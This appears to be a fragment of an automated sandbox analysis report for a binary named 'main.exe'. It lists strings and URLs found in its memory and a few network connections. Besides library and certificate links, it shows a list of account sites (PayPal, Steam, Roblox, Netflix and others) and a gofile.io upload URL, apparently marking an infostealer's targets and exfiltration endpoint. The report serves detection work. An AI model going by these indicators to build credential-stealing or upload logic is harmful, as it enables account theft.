            Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894609000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/3
            Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/p
            Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/z
            Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/19622133/
            Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://timgolden.me.uk/python/wmi.html
            Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972808038.000001E894636000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023049314.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979469125.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976470167.000001E89464B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003095511.000001E89483F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006040169.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006291215.000001E894846000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
            Source: main.exe, 00000002.00000002.2025105777.000001E894A56000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980229397.000001E894A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
            Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
            Source: main.exe, 00000002.00000003.1972971253.000001E894B59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995890221.000001E894B91000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001942358.000001E894B96000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994813697.000001E894B65000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B5A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000928411.000001E894B94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
            Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
            Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
            Source: main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/oX
            Source: main.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
            Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
            Source: main.exe, 00000002.00000003.1998028650.000001E894BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)F
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025023723.000001E894A33000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: main.exe, 00000002.00000002.2023726848.000001E894776000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981062984.000001E894776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://netflix.com)
            Source: main.exe, 00000002.00000003.1998028650.000001E894BC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://origin.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.com)
            Source: main.exe, 00000002.00000003.2001762476.000001E8945A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
            Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
            Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://palletsprojects.com/donate
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://paypal.com)
            Source: main.exe, 00000002.00000002.2017333313.000001E8933F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780566116.000001E89356F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779749185.000001E89356F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://playstation.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pornhub.com)
            Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)i75802
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)
            Source: main.exe, 00000002.00000003.1785741511.000001E8939DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978563125.000001E893A0C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012124595.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
            Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
            Source: main.exe, 00000002.00000003.2013074087.000001E89396A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013387739.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stake.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/contents/uploadfile
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
            Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
            Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
            Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
            Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
            Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
            Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
            Source: main.exe, 00000002.00000003.1975924116.000001E893326000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008458443.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012911590.000001E89334C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985986835.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977459782.000001E893349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
            Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
            Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: main.exe, 00000002.00000003.1778406388.000001E893355000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778179908.000001E893355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
            Source: main.exe, 00000002.00000002.2024904909.000001E894A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
